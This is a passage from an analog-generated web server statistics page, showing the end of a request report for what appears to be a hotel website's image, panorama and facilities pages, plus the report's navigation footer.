<tr><td class="R">47</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu2.png</td></tr>
<tr><td class="R">46</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu5.png</td></tr>
<tr><td class="R">45</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu1.png</td></tr>
<tr><td class="R">45</td><td class="b"> 0.12%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/preview.jpg</td></tr>
<tr><td class="R">44</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu4.png</td></tr>
<tr><td class="R">44</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu8.png</td></tr>
<tr><td class="R">44</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu3.png</td></tr>
<tr><td class="R">43</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu6.png</td></tr>
<tr><td class="R">42</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu7.png</td></tr>
<tr><td class="R">41</td><td class="b"> 0.16%</td><td class="D">Apr/26/19  6:15 AM</td><td class="xl">/assets/images/sliders/facili/rest/inner/7.jpg</td></tr>
<tr><td class="R">39</td><td class="b"> 0.04%</td><td class="D">Apr/14/19  6:07 PM</td><td class="xl">/facilities/bar</td></tr>
<tr><td class="R">38</td><td class="b"> 0.49%</td><td class="D">Mar/21/19  6:05 PM</td><td class="xl">/assets/images/sliders/facili/room/inner/2.jpg</td></tr>
<tr><td class="R">37</td><td class="b"> 0.17%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Output.swf</td></tr>
<tr><td class="R">34</td><td class="b"> 0.16%</td><td class="D">Apr/21/19  2:54 PM</td><td class="xl">/assets/360/reinhart_room/build.swf</td></tr>
<tr><td class="R">34</td><td class="b"> 0.13%</td><td class="D">Apr/ 9/19 11:53 PM</td><td class="xl">/assets/360/lobby/krpanoiphone.js</td></tr>
<tr><td class="R">33</td><td class="b">&nbsp;</td><td class="D">Apr/ 9/19 11:53 PM</td><td class="xl">/assets/360/lobby/krpanoiphone.license.js</td></tr>
<tr><td class="R">33</td><td class="b"> 0.11%</td><td class="D">Apr/30/19 10:12 AM</td><td class="xl">/assets/images/sliders/facili/rest/inner/1.jpg</td></tr>
<tr><td class="R">31</td><td class="b"> 0.03%</td><td class="D">Apr/12/19  2:30 AM</td><td class="xl">/facilities/about-us</td></tr>
<tr><td class="R">31</td><td class="b"> 0.45%</td><td class="D">Dec/ 3/18 11:31 PM</td><td class="xl">/assets/images/sliders/facili/room/inner/1.jpg</td></tr>
<tr><td class="R">27</td><td class="b"> 0.06%</td><td class="D">Apr/ 1/19  8:40 AM</td><td class="xl">/assets/images/sliders/facili/bar/inner/1.jpg</td></tr>
<tr><td class="R">26</td><td class="b"> 0.25%</td><td class="D">Apr/ 9/19 11:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/1/tablet_face.jpg</td></tr>
<tr><td class="R">26</td><td class="b"> 0.03%</td><td class="D">Apr/12/19  2:32 AM</td><td class="xl">/facilities/privacy-policy</td></tr>
<tr><td class="R">26</td><td class="b"> 0.19%</td><td class="D">Apr/ 9/19 11:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/4/tablet_face.jpg</td></tr>
<tr><td class="R">26</td><td class="b"> 0.23%</td><td class="D">Apr/ 9/19 11:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/5/tablet_face.jpg</td></tr>
<tr><td class="R">25</td><td class="b"> 0.22%</td><td class="D">Apr/ 9/19 11:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/2/tablet_face.jpg</td></tr>
<tr><td class="R">25</td><td class="b"> 0.30%</td><td class="D">Apr/ 9/19 11:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/3/tablet_face.jpg</td></tr>
<tr><td class="R">25</td><td class="b"> 0.24%</td><td class="D">Apr/ 9/19 11:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/0/tablet_face.jpg</td></tr>
<tr><td class="R">24</td><td class="b"> 0.05%</td><td class="D">Mar/30/19  1:55 AM</td><td class="xl">/assets/images/sliders/facili/bar/inner/4.jpg</td></tr>
<tr><td class="R">24</td><td class="b"> 0.03%</td><td class="D">Apr/12/19  2:32 AM</td><td class="xl">/facilities/terms-and-conditions</td></tr>
<tr><td class="R">22</td><td class="b"> 0.05%</td><td class="D">Mar/31/19 11:33 AM</td><td class="xl">/assets/images/sliders/facili/bar/inner/3.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.29%</td><td class="D">Mar/30/19 11:24 PM</td><td class="xl">/assets/images/sliders/facili/room/inner/3.jpg</td></tr>
<tr><td class="R">20</td><td class="b"> 0.05%</td><td class="D">Apr/25/19 10:35 PM</td><td class="xl">/assets/images/sliders/facili/bar/inner/2.jpg</td></tr>
<tr><td class="R">20</td><td class="b"> 0.02%</td><td class="D">Apr/12/19  2:32 AM</td><td class="xl">/facilities/facilities</td></tr>
<tr><td class="R">2620</td><td class="b"> 7.88%</td><td class="D">Apr/30/19  4:29 AM</td><td class="xl">[not listed: 358 files]</td></tr>
</tbody></table>
</div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>.
<br /><span class="runtimetitle">Running time:</span> 1 second.
</p>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
</div>
</body>
</html>
